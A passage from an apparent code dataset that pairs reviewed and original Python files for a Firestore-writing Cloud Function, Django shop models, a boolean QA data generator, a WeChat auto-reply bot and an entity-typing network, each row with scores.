      will contain custom attributes if there are any.
    context (google.cloud.functions.Context): The Cloud Functions event
      metadata. The `event_id` field contains the Pub/Sub message ID. The
      `timestamp` field contains the publish time.
  """
  # fix: the original signature was `context=Optional[Context]`, which made
  # the typing construct the *default value* instead of declaring an
  # annotation with a None default.
  del context  # unused
  pubsub_message = base64.b64decode(event['data']).decode('utf-8')
  msg = json.loads(pubsub_message)
  # timezone-aware "now"; stdlib UTC is equivalent to pytz.utc here
  now = datetime.datetime.now(datetime.timezone.utc)
  msg['inserted_timestamp'] = now
  if msg['operation_name'] == 'Delayed Forwarding':
    # forwarding tasks expire after their explicit delay
    delta = datetime.timedelta(seconds=int(msg['delay_in_seconds']))
  else:
    # everything else is discarded after the configured max age
    delta = datetime.timedelta(hours=DISCARD_TASKS_OLDER_THAN_HOURS)
  msg['expiration_timestamp'] = now + delta
  msg['updated_timestamp'] = now
  logger.debug('Inserting long running task into Firestore. msg: %s', msg)
  _insert_into_firestore(DEFAULT_GCP_PROJECT, COLLECTION_NAME, msg)
if __name__ == '__main__':
msg_data = {
'payload': {
'runTime': '2020-06-20T02:00:00Z'
},
'operation_name': 'Delayed Forwarding',
'delay_in_seconds': 120,
'error_topic': '',
'success_topic': 'test.pltv.periodic_extract_ready',
'source_topic': 'test.pltv.periodic_extract_ready'
}
main(
event={
'data': base64.b64encode(bytes(json.dumps(msg_data).encode('utf-8')))
},
context=None) | cfs/long_running_task_writer/main.py | import base64
import datetime
import json
import logging
import os
from typing import Any, Dict, Optional
from google.cloud import firestore
from google.cloud.functions_v1.context import Context
import google.cloud.logging
import pytz
# Set-up logging
client = google.cloud.logging.Client()
handler = google.cloud.logging.handlers.CloudLoggingHandler(client)
logger = logging.getLogger('cloudLogger')
logger.setLevel(logging.DEBUG) # defaults to WARN
logger.addHandler(handler)
COLLECTION_NAME = '{}_{}_{}'.format(
os.getenv('DEPLOYMENT_NAME', ''), os.getenv('SOLUTION_PREFIX', ''),
os.getenv('FST_LONG_RUNNING_TASKS_COLLECTION', ''))
DEFAULT_GCP_PROJECT = os.getenv('DEFAULT_GCP_PROJECT', '')
DISCARD_TASKS_OLDER_THAN_HOURS = int(
os.getenv('DISCARD_TASKS_OLDER_THAN_HOURS', '3'))
def _insert_into_firestore(project, collection, msg):
"""Writes a message into Firestore.
Args:
project: String representing the GCP project to use for the firestore DB
collection: String representing the firestore collection to use
msg: JSON object to write as Firestore document
"""
db = firestore.Client(project)
_ = db.collection(collection).add(msg)
def main(event: Dict[str, Any],
context=Optional[Context]):
"""Triggers writing a message into Firestore.
Args:
event (dict): The dictionary with data specific to this type of event. The
`data` field contains the PubsubMessage message. The `attributes` field
will contain custom attributes if there are any.
context (google.cloud.functions.Context): The Cloud Functions event
metadata. The `event_id` field contains the Pub/Sub message ID. The
`timestamp` field contains the publish time.
"""
del context # unused
pubsub_message = base64.b64decode(event['data']).decode('utf-8')
msg = json.loads(pubsub_message)
now = datetime.datetime.now(pytz.utc)
msg['inserted_timestamp'] = now
if msg['operation_name'] == 'Delayed Forwarding':
delta = datetime.timedelta(seconds=int(msg['delay_in_seconds']))
else:
delta = datetime.timedelta(hours=DISCARD_TASKS_OLDER_THAN_HOURS)
msg['expiration_timestamp'] = now + delta
msg['updated_timestamp'] = now
logger.debug('Inserting long runnning task into Firestore. msg: %s', msg)
_insert_into_firestore(DEFAULT_GCP_PROJECT, COLLECTION_NAME, msg)
if __name__ == '__main__':
msg_data = {
'payload': {
'runTime': '2020-06-20T02:00:00Z'
},
'operation_name': 'Delayed Forwarding',
'delay_in_seconds': 120,
'error_topic': '',
'success_topic': 'test.pltv.periodic_extract_ready',
'source_topic': 'test.pltv.periodic_extract_ready'
}
main(
event={
'data': base64.b64encode(bytes(json.dumps(msg_data).encode('utf-8')))
},
context=None) | 0.562657 | 0.07221 |
from django.db import models
from django.contrib.auth.models import User
from django import forms
class Customer(models.Model):
    """Shop customer profile linked one-to-one to the auth User."""
    customer = models.OneToOneField(User, null=True, blank=True, on_delete=models.CASCADE)
    # NOTE(review): "Jhon" looks like a typo for "John"; changing a field
    # default requires a migration, so only flagging it here.
    fname = models.CharField(max_length=100, default="Jhon")
    lname = models.CharField(max_length=100, default="Doe")
    # "<EMAIL>" is a redaction placeholder carried over from the original source
    email = models.EmailField(max_length=100, default="<EMAIL>")
    def __str__(self):
        # NOTE(review): raises AttributeError when customer is NULL
        # (the field allows null=True) -- confirm whether that can happen
        return self.customer.username
class Product(models.Model):
    """A sellable item (crystal, stone sculpture or pebble)."""
    tag_choices = (
        ('new', 'New'),
        ('hot', 'hot'),
        ('exclusive', 'Exclusive')
    )
    CHOICES = (
        ('crystal', 'Crystal'),
        ('statue', 'Stone Sculpture'),
        ('pebble', 'Pebble')
    )
    name = models.CharField(max_length=60)
    # fix: the default must be a stored choice *value*; the original default
    # 'Crystal' was the display label, not among the CHOICES keys, so model
    # validation (full_clean) would reject rows using the default.
    category = models.CharField(max_length=25, choices=CHOICES, default='crystal')
    price = models.FloatField()
    description = models.TextField(null=True, blank=True)
    product_image = models.ImageField(default='default_product.jpg', upload_to='products')
    # absolute discounted price, not a percentage; 0.0 means no discount
    discounted_price = models.FloatField(default=0.0)
    tag = models.CharField(max_length=10, choices=tag_choices, null=True, blank=True)
    available = models.BooleanField(default=True, null=True, blank=True)
    # digital products need no physical shipping (see Order.shipping)
    digital = models.BooleanField(default=False, null=True, blank=False)
    def __str__(self):
        return self.name
class Order(models.Model):
    """A customer's order; complete=False means it is still an open cart."""
    SHIPPING_CHOICES = (
        ('standard', 'Standard Shipping'),  # typo fix: was "Shiping"
        ('express', 'Express Delivery'),
        ('nextDay', 'Next Business day')
    )
    customer = models.ForeignKey(Customer, on_delete=models.SET_NULL, null=True, blank=True)
    # fix: the original declared `forms.ChoiceField(...)` on the Model, which
    # is a *form* field -- the ORM silently ignores it and no column was ever
    # created. Persist the selection as a real CharField instead.
    shipping_type = models.CharField(
        max_length=10, choices=SHIPPING_CHOICES, default='standard',
        null=True, blank=True)
    date_ordered = models.DateTimeField(auto_now_add=True)
    complete = models.BooleanField(default=False)
    transaction_id = models.CharField(max_length=100, null=True)
    # Code block for shipping logic: if every ordered item is digital,
    # no physical shipping is needed and the shipping form can disappear.
    @property
    def shipping(self):
        """True when at least one ordered product needs physical shipping."""
        # `is False` (not `not digital`) preserves the original semantics:
        # digital=None does NOT count as requiring shipping
        return any(
            item.product.digital is False
            for item in self.orderitem_set.all()
        )
    @property
    def get_cart_total(self):
        """Sum of line totals across all items in the order."""
        return sum(item.get_total for item in self.orderitem_set.all())
    @property
    def get_cart_items(self):
        """Total quantity across all items in the order."""
        return sum(item.quantity for item in self.orderitem_set.all())
    def __str__(self):
        return str(self.id)
class OrderItem(models.Model):
    """One product line inside an Order."""
    product = models.ForeignKey(Product, on_delete=models.SET_NULL, null=True)
    order = models.ForeignKey(Order, on_delete=models.SET_NULL, null=True)
    quantity = models.IntegerField(default=0, null=True, blank=True)
    date_added = models.DateTimeField(auto_now_add=True)
    @property
    def get_total(self):
        """Line total (price * quantity).

        Returns 0 when the product reference was nulled (SET_NULL) or the
        quantity is NULL -- the original raised TypeError/AttributeError in
        those cases.
        """
        if self.product is None or self.quantity is None:
            return 0
        return self.product.price * self.quantity
class ShippingAdress(models.Model):
customer = models.ForeignKey(Customer, on_delete=models.SET_NULL, null=True)
order = models.ForeignKey(Order, on_delete=models.SET_NULL, null=True)
address = models.CharField(max_length=250, null=False)
city = models.CharField(max_length=150, null=False)
state = models.CharField(max_length=150, null=False)
zipcode = models.CharField(max_length=50, null=False)
date_added = models.DateField(auto_now_add=True)
def __str__(self):
return self.address | shop/models.py | from django.db import models
from django.contrib.auth.models import User
from django import forms
class Customer(models.Model):
customer = models.OneToOneField(User, null=True, blank=True, on_delete=models.CASCADE)
fname = models.CharField(max_length=100, default="Jhon")
lname = models.CharField(max_length=100, default="Doe")
email = models.EmailField(max_length=100, default="<EMAIL>")
def __str__(self):
return self.customer.username
class Product(models.Model):
tag_choices = (
('new', 'New'),
('hot', 'hot'),
('exclusive', 'Exclusive')
)
CHOICES = (
('crystal', 'Crystal'),
('statue', 'Stone Sculpture'),
('pebble', 'Pebble')
)
name = models.CharField(max_length=60)
category = models.CharField(max_length=25, choices=CHOICES, default='Crystal')
price = models.FloatField()
description = models.TextField(null=True, blank=True )
product_image = models.ImageField(default='default_product.jpg', upload_to='products')
discounted_price = models.FloatField(default=0.0)
tag = models.CharField(max_length=10, choices=tag_choices, null=True, blank=True)
available = models.BooleanField(default=True, null=True, blank=True)
digital = models.BooleanField(default=False, null=True, blank=False)
def __str__(self):
return self.name
class Order(models.Model):
SHIPPING_CHOICES = (
('standard', 'Standard Shiping'),
('express', 'Express Delivery'),
('nextDay', 'Next Business day')
)
customer = models.ForeignKey(Customer, on_delete=models.SET_NULL, null=True, blank=True)
shipping_type = forms.ChoiceField(choices=SHIPPING_CHOICES, widget=forms.RadioSelect())
date_ordered = models.DateTimeField(auto_now_add=True)
complete = models.BooleanField(default=False)
transaction_id = models.CharField(max_length=100, null=True)
# Code block for shipping logic if there are digital items that doesn't need shipping the forms disappears.
@property
def shipping(self):
shipping = False
orderitems = self.orderitem_set.all()
for i in orderitems:
if i.product.digital == False:
shipping = True
return shipping
@property
def get_cart_total(self):
orderitems = self.orderitem_set.all()
total = sum([item.get_total for item in orderitems])
return total
@property
def get_cart_items(self):
orderitems = self.orderitem_set.all()
total = sum([item.quantity for item in orderitems])
return total
def __str__(self):
return str(self.id)
class OrderItem(models.Model):
product = models.ForeignKey(Product, on_delete=models.SET_NULL, null=True)
order = models.ForeignKey(Order, on_delete=models.SET_NULL, null=True)
quantity = models.IntegerField(default=0, null=True, blank=True)
date_added = models.DateTimeField(auto_now_add=True)
@property
def get_total(self):
total = self.product.price * self.quantity
return total
class ShippingAdress(models.Model):
customer = models.ForeignKey(Customer, on_delete=models.SET_NULL, null=True)
order = models.ForeignKey(Order, on_delete=models.SET_NULL, null=True)
address = models.CharField(max_length=250, null=False)
city = models.CharField(max_length=150, null=False)
state = models.CharField(max_length=150, null=False)
zipcode = models.CharField(max_length=50, null=False)
date_added = models.DateField(auto_now_add=True)
def __str__(self):
return self.address | 0.52074 | 0.081886 |
import pandas as pd
try:
from boolean1_neg import boolean1
except ImportError:
from contra_qa.text_generation.boolean1_neg import boolean1
try:
from boolean2_S_and import boolean2
except ImportError:
from contra_qa.text_generation.boolean2_S_and import boolean2
try:
from boolean3_NP_and import boolean3
except ImportError:
from contra_qa.text_generation.boolean3_NP_and import boolean3
try:
from boolean4_VP_and import boolean4
except ImportError:
from contra_qa.text_generation.boolean4_VP_and import boolean4
try:
from boolean5_AP_and import boolean5
except ImportError:
from contra_qa.text_generation.boolean5_AP_and import boolean5
try:
from boolean6_implicit_and import boolean6
except ImportError:
from contra_qa.text_generation.boolean6_implicit_and import boolean6
try:
from boolean7_S_or import boolean7
except ImportError:
from contra_qa.text_generation.boolean7_S_or import boolean7
try:
from boolean8_NP_or import boolean8
except ImportError:
from contra_qa.text_generation.boolean8_NP_or import boolean8
try:
from boolean9_VP_or import boolean9
except ImportError:
from contra_qa.text_generation.boolean9_VP_or import boolean9
try:
from boolean10_AP_or import boolean10
except ImportError:
from contra_qa.text_generation.boolean10_AP_or import boolean10
def _read_splits(ids, split):
    """Load the per-phenomenon csv files data/boolean{i}_{split}.csv."""
    return [pd.read_csv("data/boolean{}_{}.csv".format(i, split)) for i in ids]


def _shuffle_truncate_save(frames, path, limit):
    """Concat *frames*, shuffle rows, keep the first *limit*, write csv.

    Returns the truncated frame so callers can reuse it for further merges.
    """
    df = pd.concat(frames)
    df = df.sample(frac=1).reset_index(drop=True)
    df = df.iloc[:limit]
    df.to_csv(path, index=False)
    return df


def create_all():
    """Generate every base dataset, then the merged AND / OR / boolean csvs.

    Writes data/boolean_AND_{train,test}.csv, data/boolean_OR_{train,test}.csv
    and data/boolean_{train,test}.csv (10000 train / 1000 test rows each).
    """
    # regenerate the ten base datasets (each writes data/boolean{i}_{train,test}.csv)
    for generator in (boolean1, boolean2, boolean3, boolean4, boolean5,
                      boolean6, boolean7, boolean8, boolean9, boolean10):
        generator()
    # AND dataset: phenomena 2-6 (S/NP/VP/AP/implicit "and")
    df_train_and = _shuffle_truncate_save(
        _read_splits(range(2, 7), "train"), "data/boolean_AND_train.csv", 10000)
    df_test_and = _shuffle_truncate_save(
        _read_splits(range(2, 7), "test"), "data/boolean_AND_test.csv", 1000)
    # OR dataset: phenomena 7-10 (S/NP/VP/AP "or")
    df_train_or = _shuffle_truncate_save(
        _read_splits(range(7, 11), "train"), "data/boolean_OR_train.csv", 10000)
    df_test_or = _shuffle_truncate_save(
        _read_splits(range(7, 11), "test"), "data/boolean_OR_test.csv", 1000)
    # combined boolean dataset: resampled from the (already truncated)
    # AND/OR mixes, matching the original pipeline exactly
    _shuffle_truncate_save([df_train_and, df_train_or],
                           "data/boolean_train.csv", 10000)
    _shuffle_truncate_save([df_test_and, df_test_or],
                           "data/boolean_test.csv", 1000)
if __name__ == '__main__':
create_all() | contra_qa/text_generation/boolean_data_gen.py | import pandas as pd
try:
from boolean1_neg import boolean1
except ImportError:
from contra_qa.text_generation.boolean1_neg import boolean1
try:
from boolean2_S_and import boolean2
except ImportError:
from contra_qa.text_generation.boolean2_S_and import boolean2
try:
from boolean3_NP_and import boolean3
except ImportError:
from contra_qa.text_generation.boolean3_NP_and import boolean3
try:
from boolean4_VP_and import boolean4
except ImportError:
from contra_qa.text_generation.boolean4_VP_and import boolean4
try:
from boolean5_AP_and import boolean5
except ImportError:
from contra_qa.text_generation.boolean5_AP_and import boolean5
try:
from boolean6_implicit_and import boolean6
except ImportError:
from contra_qa.text_generation.boolean6_implicit_and import boolean6
try:
from boolean7_S_or import boolean7
except ImportError:
from contra_qa.text_generation.boolean7_S_or import boolean7
try:
from boolean8_NP_or import boolean8
except ImportError:
from contra_qa.text_generation.boolean8_NP_or import boolean8
try:
from boolean9_VP_or import boolean9
except ImportError:
from contra_qa.text_generation.boolean9_VP_or import boolean9
try:
from boolean10_AP_or import boolean10
except ImportError:
from contra_qa.text_generation.boolean10_AP_or import boolean10
def create_all():
boolean1()
boolean2()
boolean3()
boolean4()
boolean5()
boolean6()
boolean7()
boolean8()
boolean9()
boolean10()
# creating the AND dataset
df2_tr = pd.read_csv("data/boolean2_train.csv")
df3_tr = pd.read_csv("data/boolean3_train.csv")
df4_tr = pd.read_csv("data/boolean4_train.csv")
df5_tr = pd.read_csv("data/boolean5_train.csv")
df6_tr = pd.read_csv("data/boolean6_train.csv")
df2_te = pd.read_csv("data/boolean2_test.csv")
df3_te = pd.read_csv("data/boolean3_test.csv")
df4_te = pd.read_csv("data/boolean4_test.csv")
df5_te = pd.read_csv("data/boolean5_test.csv")
df6_te = pd.read_csv("data/boolean6_test.csv")
train_and = [df2_tr, df3_tr, df4_tr, df5_tr, df6_tr]
test_and = [df2_te, df3_te, df4_te, df5_te, df6_te]
df_train_and = pd.concat(train_and)
df_test_and = pd.concat(test_and)
df_train_and = df_train_and.sample(frac=1).reset_index(drop=True)
df_test_and = df_test_and.sample(frac=1).reset_index(drop=True)
df_train_and = df_train_and.iloc[:10000]
df_test_and = df_test_and.iloc[:1000]
df_train_and.to_csv("data/boolean_AND_train.csv", index=False)
df_test_and.to_csv("data/boolean_AND_test.csv", index=False)
# creating the OR dataset
df7_tr = pd.read_csv("data/boolean7_train.csv")
df8_tr = pd.read_csv("data/boolean8_train.csv")
df9_tr = pd.read_csv("data/boolean9_train.csv")
df10_tr = pd.read_csv("data/boolean10_train.csv")
df7_te = pd.read_csv("data/boolean7_test.csv")
df8_te = pd.read_csv("data/boolean8_test.csv")
df9_te = pd.read_csv("data/boolean9_test.csv")
df10_te = pd.read_csv("data/boolean10_test.csv")
train_or = [df7_tr, df8_tr, df9_tr, df10_tr]
test_or = [df7_te, df8_te, df9_te, df10_te]
df_train_or = pd.concat(train_or)
df_test_or = pd.concat(test_or)
df_train_or = df_train_or.sample(frac=1).reset_index(drop=True)
df_test_or = df_test_or.sample(frac=1).reset_index(drop=True)
df_train_or = df_train_or.iloc[:10000]
df_test_or = df_test_or.iloc[:1000]
df_train_or.to_csv("data/boolean_OR_train.csv", index=False)
df_test_or.to_csv("data/boolean_OR_test.csv", index=False)
# creating the boolean dataset
boolean_train = [df_train_and, df_train_or]
boolean_test = [df_test_and, df_test_or]
df_boolean_train = pd.concat(boolean_train)
df_boolean_test = pd.concat(boolean_test)
df_boolean_train = df_boolean_train.sample(frac=1).reset_index(drop=True)
df_boolean_test = df_boolean_test.sample(frac=1).reset_index(drop=True)
df_boolean_train = df_boolean_train.iloc[:10000]
df_boolean_test = df_boolean_test.iloc[:1000]
df_boolean_train.to_csv("data/boolean_train.csv", index=False)
df_boolean_test.to_csv("data/boolean_test.csv", index=False)
if __name__ == '__main__':
create_all() | 0.465145 | 0.267121 |
import logging
import itchat
import robot
import log
from config import friend_wechat_remarknames,reply_msg_from_myself
logger = logging.getLogger('MyItChatDemo')
reply_friends = []
@itchat.msg_register(itchat.content.TEXT)
def msg_reply(msg):
    """Handle incoming TEXT messages.

    Always asks the robot for a reply (presumably so the robot keeps
    per-user conversation context -- confirm), but only returns it -- and
    thus only replies -- when the sender is in the auto-reply whitelist.
    """
    print(msg)
    content = msg['Text']
    from_user_name = msg['FromUserName']
    from_user_remarkname = msg['User']['RemarkName']
    logger.info('receive text : {content} from remarkName:{FromUserRemarkName} to userName:{username} '
                .format(content=content,FromUserRemarkName=from_user_remarkname,username=from_user_name))
    try:
        reply_content = robot.get_reply_msg(content, from_user_name)
    except Exception as e:
        # best-effort: log robot failures and send no reply
        logger.error('get reply from robot failed: %s' % e)
        return
    if is_auto_replay(from_user_name) :
        logger.info('reply {content} to remarkName:{FromUserRemarkName} userName:{username} '
                    .format(content=reply_content,FromUserRemarkName=from_user_remarkname,username=from_user_name))
        return reply_content
@itchat.msg_register(itchat.content.PICTURE)
def picture_reply(msg):
    """Handle PICTURE messages: ask whitelisted friends to stick to text.

    Renamed from ``msg_reply``: the original reused the TEXT handler's name,
    shadowing it at module level (itchat's decorator registration itself
    was unaffected, but the collision hid the first function).
    """
    from_user_name = msg['FromUserName']
    from_user_remarkname = msg['User']['RemarkName']
    logger.info('receive unsupported content from remarkName:{FromUserRemarkName} from userName:{username} '
                .format(FromUserRemarkName=from_user_remarkname, username=from_user_name))
    if is_auto_replay(from_user_name):
        return '好好聊天,不要发表情、语音……'
def is_auto_replay(from_user_name):
    """Return True when *from_user_name* is registered for automatic replies."""
    whitelisted = from_user_name in reply_friends
    return whitelisted
def get_username_with_remarknames(friend_wechat_remarknames):
    """Resolve remark names to WeChat UserNames and register them for auto-reply."""
    usernames = [
        friend['UserName']
        for remarkname in friend_wechat_remarknames
        for friend in itchat.search_friends(remarkName=remarkname)
    ]
    reply_friends.extend(usernames)
def main():
    """Log in to WeChat, build the auto-reply whitelist and start the event loop."""
    log.set_logging(loggingLevel=logging.INFO)
    # hotReload caches the login so a restart needs no fresh QR-code scan
    itchat.auto_login(hotReload=True)
    # search_friends() with no filter -- presumably returns the logged-in
    # user's own info dict (used below for self-reply); confirm with itchat docs
    user_info = itchat.search_friends()
    get_username_with_remarknames(friend_wechat_remarknames)
    logger.info('login success userInfo:{user_info}'.format(user_info=user_info))
    if reply_msg_from_myself:
        # also auto-reply to messages sent from this account itself
        reply_friends.append(user_info['UserName'])
    itchat.run()
if __name__ == "__main__":
main() | ChatRobot_Demo/startup.py | import logging
import itchat
import robot
import log
from config import friend_wechat_remarknames,reply_msg_from_myself
logger = logging.getLogger('MyItChatDemo')
reply_friends = []
@itchat.msg_register(itchat.content.TEXT)
def msg_reply(msg):
print(msg)
content = msg['Text']
from_user_name = msg['FromUserName']
from_user_remarkname = msg['User']['RemarkName']
logger.info('receive text : {content} from remarkName:{FromUserRemarkName} to userName:{username} '
.format(content=content,FromUserRemarkName=from_user_remarkname,username=from_user_name))
try:
reply_content = robot.get_reply_msg(content, from_user_name)
except Exception as e:
logger.error('get reply from robot failed: %s' % e)
return
if is_auto_replay(from_user_name) :
logger.info('reply {content} to remarkName:{FromUserRemarkName} userName:{username} '
.format(content=reply_content,FromUserRemarkName=from_user_remarkname,username=from_user_name))
return reply_content
@itchat.msg_register(itchat.content.PICTURE)
def msg_reply(msg):
from_user_name = msg['FromUserName']
from_user_remarkname = msg['User']['RemarkName']
logger.info('receive unsupported content from remarkName:{FromUserRemarkName} from userName:{username} '
.format(FromUserRemarkName=from_user_remarkname, username=from_user_name))
if is_auto_replay(from_user_name):
return '好好聊天,不要发表情、语音……'
def is_auto_replay(from_user_name):
return from_user_name in reply_friends
def get_username_with_remarknames(friend_wechat_remarknames):
for remarkname in friend_wechat_remarknames:
friends = itchat.search_friends(remarkName=remarkname)
for friend in friends:
reply_friends.append(friend['UserName'])
def main():
log.set_logging(loggingLevel=logging.INFO)
itchat.auto_login(hotReload=True)
user_info = itchat.search_friends()
get_username_with_remarknames(friend_wechat_remarknames)
logger.info('login success userInfo:{user_info}'.format(user_info=user_info))
if reply_msg_from_myself:
reply_friends.append(user_info['UserName'])
itchat.run()
if __name__ == "__main__":
main() | 0.139866 | 0.045395 |
from pytorch_lightning.core.lightning import LightningModule
from entity_typing_framework.utils.implemented_classes_lvl1 import IMPLEMENTED_CLASSES_LVL1
import torch
class BaseEntityTypingNetwork(LightningModule):
    '''
    Basic :ref:`EntityTypingNetwork <EntityTypingNetwork>`. This module is able to use the following submodules:
    :ref:`encoder <encoder>`:
    :ref:`entity_typing_framework.EntityTypingNetwork_classes.input_encoders.DistilBERTEncoder <DistilBERTEncoder>`
    :ref:`entity_typing_framework.EntityTypingNetwork_classes.input_encoders.AdapterDistilBERTEncoder <AdapterDistilBERTEncoder>`
    :ref:`type_encoder <type_encoder>`:
    :ref:`entity_typing_framework.EntityTypingNetwork_classes.type_encoders.OneHotTypeEncoder <OneHotTypeEncoder>`
    :ref:`input_projector <input_projector>`:
    :ref:`entity_typing_framework.EntityTypingNetwork_classes.type_encoders.Classifier <Classifier>`
    Parameters:
    name:
    the name of the module, specified in the :code:`yaml` configuration file under the key :code:`model.ET_Network_params.name`. Has to be declared in the :doc:`module_dictionary`
    network_params:
    parameters for the module and for the submodules, specified in the :code:`yaml` configuration file under the key :code:`model.ET_Network_params.network_params`
    expected keys in network_params are: :code:`model.ET_Network_params.network_params.encoder_params`, :code:`model.ET_Network_params.network_params.type_encoder_params`, and :code:`model.ET_Network_params.network_params.input_projector_params`
    type_number:
    number of types for this run. Automatic managed through :ref:`DatasetManager <DatasetManager>`
    '''
    def __init__(self, name, network_params, type_number
    # , encoder_params, type_encoder_params,
    # inference_params, metric_manager_params, loss_params,
    ):
        super().__init__()
        # instantiate the three submodules; IMPLEMENTED_CLASSES_LVL1 maps the
        # config-declared "name" string to the implementing class
        encoder_params = network_params['encoder_params']
        self.encoder = IMPLEMENTED_CLASSES_LVL1[encoder_params['name']](**encoder_params)
        type_encoder_params = network_params['type_encoder_params']
        self.type_encoder = IMPLEMENTED_CLASSES_LVL1[type_encoder_params['name']](type_number=type_number, **type_encoder_params)
        input_projector_params = network_params['input_projector_params']
        # the projector's input width is dictated by the encoder's output width
        self.input_projector = IMPLEMENTED_CLASSES_LVL1[input_projector_params['name']](type_number=type_number,
                                                        input_dim = self.encoder.get_representation_dim(),
                                                        **input_projector_params)
    def forward(self, batch):
        '''
        override of :code:pytorch_lightning.LightningModule.forward (`ref <https://pytorch-lightning.readthedocs.io/en/stable/extensions/datamodules.html>`_)
        parameters:
        batch:
        the batch returned by the :ref:`Dataset <dataset>`
        return:
        projected_input:
        output of the :ref:`input_projector <input_projector>`. Commonly the :ref:`input_projector <input_projector>` takes in input the output of the :ref:`encoder <encoder>`
        encoded_types:
        output of the :ref:`type_encoder <type_encoder>`.
        '''
        # batch layout: (token ids, attention masks, gold type labels)
        batched_sentences, batched_attn_masks, batched_labels = batch
        encoded_input = self.encoder(batched_sentences, batched_attn_masks)
        projected_input = self.input_projector(encoded_input)
        encoded_types = self.type_encoder(batched_labels)
        return projected_input, encoded_types
    def load_from_checkpoint(self, checkpoint_to_load, strict, **kwargs):
        """Load weights from a Lightning checkpoint file into this network.

        Strips the 'ET_Network.' prefix that the training wrapper adds to
        parameter names before loading. Extra **kwargs are accepted but
        ignored. NOTE(review): torch.load without map_location will fail on
        CPU-only machines for GPU-saved checkpoints -- confirm.
        """
        state_dict = torch.load(checkpoint_to_load)
        new_state_dict = {k.replace('ET_Network.', ''): v for k, v in state_dict['state_dict'].items()}
        self.load_state_dict(new_state_dict, strict=strict)
        return self
class EntityTypingNetworkForIncrementalTraining(BaseEntityTypingNetwork):
    """Extends the base network with a second, trainable projector head for
    newly introduced types while the pretrained network stays frozen."""
    def setup_incremental_training(self, new_type_number, network_params):
        # Freeze the pretrained network and attach a fresh projector sized
        # for the *new* types only.
        input_projector_params = network_params['input_projector_params']
        ## extract last classifier layer and manually insert the out_features number
        # NOTE(review): sorted() on the layer keys is lexicographic -- with
        # ten or more layers '10' sorts before '2'; confirm the key naming
        # guarantees the intended order.
        single_layers = sorted(input_projector_params['layers_parameters'].items())
        single_layers[-1][1]['out_features'] = new_type_number
        input_projector_params['layers_parameters'] = {k: v for k, v in single_layers}
        self.freeze()
        self.additional_input_projector = IMPLEMENTED_CLASSES_LVL1[input_projector_params['name']](type_number=new_type_number,
                                                        input_dim = self.encoder.get_representation_dim(),
                                                        **input_projector_params)
    def forward(self, batch):
        # Run both the frozen projector and the new head and concatenate
        # their type scores along dim 1 (the type dimension).
        batched_sentences, batched_attn_masks, batched_labels = batch
        encoded_input = self.encoder(batched_sentences, batched_attn_masks)
        projected_input = self.input_projector(encoded_input)
        additional_projected_input = self.additional_input_projector(encoded_input)
        network_output = torch.concat((projected_input, additional_projected_input), dim = 1)
        encoded_types = self.type_encoder(batched_labels)
        # the final `return network_output, encoded_types` sits on the next
        # source line (corrupted by dataset row separators); left untouched
return network_output, encoded_types | entity_typing_framework/EntityTypingNetwork_classes/base_network.py | from pytorch_lightning.core.lightning import LightningModule
from entity_typing_framework.utils.implemented_classes_lvl1 import IMPLEMENTED_CLASSES_LVL1
import torch
class BaseEntityTypingNetwork(LightningModule):
'''
Basic :ref:`EntityTypingNetwork <EntityTypingNetwork>`. This module is able to use the following submodules:
:ref:`encoder <encoder>`:
:ref:`entity_typing_framework.EntityTypingNetwork_classes.input_encoders.DistilBERTEncoder <DistilBERTEncoder>`
:ref:`entity_typing_framework.EntityTypingNetwork_classes.input_encoders.AdapterDistilBERTEncoder <AdapterDistilBERTEncoder>`
:ref:`type_encoder <type_encoder>`:
:ref:`entity_typing_framework.EntityTypingNetwork_classes.type_encoders.OneHotTypeEncoder <OneHotTypeEncoder>`
:ref:`input_projector <input_projector>`:
:ref:`entity_typing_framework.EntityTypingNetwork_classes.type_encoders.Classifier <Classifier>`
Parameters:
name:
the name of the module, specified in the :code:`yaml` configuration file under the key :code:`model.ET_Network_params.name`. Has to be declared in the :doc:`module_dictionary`
network_params:
parameters for the module and for the submodules, specified in the :code:`yaml` configuration file under the key :code:`model.ET_Network_params.network_params`
expected keys in network_params are: :code:`model.ET_Network_params.network_params.encoder_params`, :code:`model.ET_Network_params.network_params.type_encoder_params`, and :code:`model.ET_Network_params.network_params.input_projector_params`
type_number:
number of types for this run. Automatic managed through :ref:`DatasetManager <DatasetManager>`
'''
def __init__(self, name, network_params, type_number
# , encoder_params, type_encoder_params,
# inference_params, metric_manager_params, loss_params,
):
super().__init__()
encoder_params = network_params['encoder_params']
self.encoder = IMPLEMENTED_CLASSES_LVL1[encoder_params['name']](**encoder_params)
type_encoder_params = network_params['type_encoder_params']
self.type_encoder = IMPLEMENTED_CLASSES_LVL1[type_encoder_params['name']](type_number=type_number, **type_encoder_params)
input_projector_params = network_params['input_projector_params']
self.input_projector = IMPLEMENTED_CLASSES_LVL1[input_projector_params['name']](type_number=type_number,
input_dim = self.encoder.get_representation_dim(),
**input_projector_params)
def forward(self, batch):
'''
override of :code:pytorch_lightning.LightningModule.forward (`ref <https://pytorch-lightning.readthedocs.io/en/stable/extensions/datamodules.html>`_)
parameters:
batch:
the batch returned by the :ref:`Dataset <dataset>`
return:
projected_input:
output of the :ref:`input_projector <input_projector>`. Commonly the :ref:`input_projector <input_projector>` takes in input the output of the :ref:`encoder <encoder>`
encoded_types:
output of the :ref:`type_encoder <type_encoder>`.
'''
batched_sentences, batched_attn_masks, batched_labels = batch
encoded_input = self.encoder(batched_sentences, batched_attn_masks)
projected_input = self.input_projector(encoded_input)
encoded_types = self.type_encoder(batched_labels)
return projected_input, encoded_types
def load_from_checkpoint(self, checkpoint_to_load, strict, **kwargs):
state_dict = torch.load(checkpoint_to_load)
new_state_dict = {k.replace('ET_Network.', ''): v for k, v in state_dict['state_dict'].items()}
self.load_state_dict(new_state_dict, strict=strict)
return self
class EntityTypingNetworkForIncrementalTraining(BaseEntityTypingNetwork):
def setup_incremental_training(self, new_type_number, network_params):
input_projector_params = network_params['input_projector_params']
## extract last classifier layer and manually insert the out_features number
single_layers = sorted(input_projector_params['layers_parameters'].items())
single_layers[-1][1]['out_features'] = new_type_number
input_projector_params['layers_parameters'] = {k: v for k, v in single_layers}
self.freeze()
self.additional_input_projector = IMPLEMENTED_CLASSES_LVL1[input_projector_params['name']](type_number=new_type_number,
input_dim = self.encoder.get_representation_dim(),
**input_projector_params)
def forward(self, batch):
batched_sentences, batched_attn_masks, batched_labels = batch
encoded_input = self.encoder(batched_sentences, batched_attn_masks)
projected_input = self.input_projector(encoded_input)
additional_projected_input = self.additional_input_projector(encoded_input)
network_output = torch.concat((projected_input, additional_projected_input), dim = 1)
